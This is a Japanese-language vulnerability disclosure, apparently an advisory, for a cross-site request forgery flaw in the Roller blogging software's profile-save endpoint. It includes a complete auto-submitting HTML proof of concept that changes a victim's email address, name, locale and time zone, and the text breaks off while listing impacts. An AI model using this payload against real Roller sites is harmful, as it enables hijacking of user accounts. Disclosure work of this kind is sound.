
Roller v6.1.2 以前には、エンドポイント /roller/roller-ui/profile!save.rol にクロスサイトリクエストフォージェリ(CSRF)の脆弱性が存在することが判明しました。
この脆弱性により、攻撃者は巧妙に細工された HTML ページを介して、被害ユーザーのプロフィール情報(例:メールアドレス、氏名、ロケール、タイムゾーン)を任意に更新することが可能です。
この脆弱性により、CSRF 保護なしで /roller/roller-ui/profile!save.rol への不正なリクエストが可能となり、ユーザーのプロフィールが更新されます。
<html>
<head>
<form id="exploitForm" action="http://localhost:8080/roller/roller-ui/profile!save.rol" method="POST">
<input name="bean.userName" value="vanlam" type="hidden">
<input name="bean.screenName" value="hacked" type="hidden">
<input name="bean.fullName" value="hacked" type="hidden">
<input name="bean.emailAddress" value="[email protected]" type="hidden">
<input name="bean.passwordText" value="" type="hidden">
<input name="bean.passwordConfirm" value="" type="hidden">
<input name="bean.locale" value="vi_VN" type="hidden">
<input name="bean.timeZone" value="Asia/Bangkok" type="hidden">
</form>
<script>
document.getElementById('exploitForm').submit();
</script>
</head>
</html>
bean.userName: vanlambean.screenName: hackedbean.fullName: hackedbean.emailAddress: [email protected]bean.passwordText: (空)bean.passwordConfirm: (空)bean.locale: vi_VNbean.timeZone: Asia/Bangkok攻撃者は悪意のある HTML ページを作成し、認証済みの Roller ユーザーがそのページにアクセスすると、被害者のプロフィール情報を本人の同意なしに更新するフォームが自動的に送信されます。これにより、以下のような被害が発生する可能性があります: